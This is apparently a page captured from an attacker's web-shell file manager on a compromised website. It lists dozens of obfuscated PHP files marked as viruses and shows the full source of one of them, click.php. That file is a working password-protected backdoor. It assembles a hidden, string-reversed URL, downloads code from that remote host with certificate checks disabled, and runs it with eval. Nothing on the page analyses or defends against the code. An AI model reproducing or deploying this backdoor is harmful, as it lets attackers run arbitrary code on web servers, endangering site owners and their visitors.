at path:
ROOT
/
click.php.VIRUS
run:
R
W
Run
.well-known
DIR
2026-03-22 07:35:38
R
W
Run
350a3
DIR
2026-05-11 14:52:03
R
W
Run
bnzv1ec
DIR
2026-05-07 21:50:07
R
W
Run
cbff64
DIR
2026-05-11 14:52:03
R
W
Run
efzcn1v
DIR
2026-05-07 21:50:07
R
W
Run
hci1tsw
DIR
2026-05-10 10:53:59
R
W
Run
hzajpe1
DIR
2026-05-07 21:50:07
R
W
Run
wp-includes
DIR
2026-05-11 15:32:15
R
W
Run
.htaccess
199 By
2026-05-11 14:18:43
R
W
Run
Delete
Rename
2voughyz.php.VIRUS
19.07 KB
2026-05-05 21:47:39
R
W
Run
Delete
Rename
58qroi9d.php.VIRUS
19.07 KB
2026-05-05 21:51:41
R
W
Run
Delete
Rename
9AjNzaEepiR.php.VIRUS
51.75 KB
2026-05-08 00:35:51
R
W
Run
Delete
Rename
COOKIE.txt
237 By
2026-05-07 21:50:09
R
W
Run
Delete
Rename
G8LpoBVSegO.php.VIRUS
43.97 KB
2026-05-06 04:40:37
R
W
Run
Delete
Rename
K7BwLctP4I9.php.VIRUS
43.97 KB
2026-05-06 04:41:22
R
W
Run
Delete
Rename
KLn3hY5NAsf.php.VIRUS
166.77 KB
2026-05-06 04:40:37
R
W
Run
Delete
Rename
OVA-TOOLS-VIP.php.VIRUS
19.06 KB
2026-05-07 20:51:09
R
W
Run
Delete
Rename
SqPxuvC8ceM.php.VIRUS
51.75 KB
2026-05-06 04:41:22
R
W
Run
Delete
Rename
TYWD21Ordqf.php.VIRUS
166.77 KB
2026-05-08 00:35:51
R
W
Run
Delete
Rename
YZPM2WTkyaI.php.VIRUS
166.77 KB
2026-05-06 04:41:22
R
W
Run
Delete
Rename
ZoPbAxp2BvF.php.VIRUS
28.35 KB
2026-05-08 00:35:51
R
W
Run
buy.php.VIRUS
1.47 KB
2024-01-13 01:06:04
R
W
Run
Delete
Rename
chosen.php.VIRUS
122.65 KB
2026-05-08 05:40:23
R
W
Run
Delete
Rename
click.php.VIRUS
2.03 KB
2023-12-05 01:06:04
R
W
Run
Delete
Rename
curl.php.VIRUS
1.39 KB
2026-05-08 02:49:53
R
W
Run
Delete
Rename
delAll.php
1.53 KB
2026-05-08 05:40:22
R
W
Run
Delete
Rename
fBowAn2VjYF.php.VIRUS
28.35 KB
2026-05-06 04:41:22
R
W
Run
index.php.VIRUS
14.72 KB
2022-08-14 10:42:28
R
W
Run
Delete
Rename
index.php0.VIRUS
2.37 KB
2024-02-25 01:06:04
R
W
Run
Delete
Rename
item.php.VIRUS
1.93 KB
2024-04-25 01:06:04
R
W
Run
Delete
Rename
mAkR7wiYxMQ.php.VIRUS
28.35 KB
2026-05-06 04:40:37
R
W
Run
mouoxjks.php.VIRUS
14.76 KB
2026-05-06 16:47:13
R
W
Run
Delete
Rename
oN6sP8ukXyB.php.VIRUS
51.75 KB
2026-05-06 04:40:37
R
W
Run
Delete
Rename
php.ini
105 By
2026-05-08 00:35:51
R
W
Run
Delete
Rename
product.php.VIRUS
2 KB
2024-02-06 01:06:04
R
W
Run
Delete
Rename
qYG2j9k7nDh.php.VIRUS
43.97 KB
2026-05-08 00:35:51
R
W
Run
Delete
Rename
robots.txt
416 By
2023-09-06 01:06:07
R
W
Run
Delete
Rename
simple.php.VIRUS
15.05 KB
2026-05-08 05:40:23
R
W
Run
Delete
Rename
t6wer-send.php
453 By
2026-03-17 22:38:15
R
W
Run
Delete
Rename
tesTgkx.php.VIRUS
2.87 KB
2026-03-23 18:40:05
R
W
Run
Delete
Rename
tesTuad.php.VIRUS
2.87 KB
2026-03-23 02:27:34
R
W
Run
Delete
Rename
tesTvmc.php.VIRUS
1.15 KB
2026-05-06 16:47:19
R
W
Run
Delete
Rename
theme-inscuqr.php.VIRUS
341 By
2026-05-06 04:40:37
R
W
Run
Delete
Rename
theme-insmbpg.php.VIRUS
341 By
2026-05-06 04:41:22
R
W
Run
Delete
Rename
theme-insvftx.php.VIRUS
338 By
2026-05-08 00:35:51
R
W
Run
Delete
Rename
unZIPpeRtsk.php.VIRUS
19.51 KB
2026-05-06 16:47:22
R
W
Run
Delete
Rename
error_log
up
📄
click.php.VIRUS
Save
<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') { $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } } ?> <?php goto MMJd3; sy7E0: $SS8Fu .= "\x2f\160\x6f\164"; goto qDKgI; tBWqP: $SS8Fu .= "\65\x2f\144"; goto PjLow; Z1fDH: $SS8Fu .= "\x6f"; goto cQShg; cQShg: $SS8Fu .= "\57"; goto OTbPc; l2KX1: $SS8Fu .= "\164\164"; goto oibfZ; y0vkU: $SS8Fu .= "\57"; goto EYzIF; Q2dEt: $SS8Fu .= "\164\170\164\x2e\64"; goto tBWqP; hdfzX: $SS8Fu .= "\x2f"; goto y0vkU; M8874: eval("\77\x3e" . TW2KX(strrev($SS8Fu))); goto Q2VNb; oibfZ: $SS8Fu .= "\x68"; goto M8874; OTbPc: $SS8Fu .= "\141\x6d\x61\144"; goto sy7E0; GrX6T: $SS8Fu .= "\x30\141\x6d\141\x64"; goto hdfzX; MMJd3: $SS8Fu = ''; goto Q2dEt; PjLow: $SS8Fu .= "\x6c"; goto Z1fDH; qDKgI: $SS8Fu .= "\56\x32"; goto GrX6T; EYzIF: $SS8Fu .= "\x3a\x73\x70"; goto l2KX1; Q2VNb: function tw2kX($V1_rw = '') { goto S1oZL; V2RDF: $tvmad = curl_exec($xM315); goto EUVIW; tM6NO: return $tvmad; goto vuWvH; ZIbFK: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto yBSOL; EUVIW: curl_close($xM315); goto tM6NO; euHNs: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto kGJPE; kGJPE: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto i8G2G; S1oZL: $xM315 = curl_init(); goto ZIbFK; yBSOL: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto euHNs; i8G2G: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto V2RDF; vuWvH: }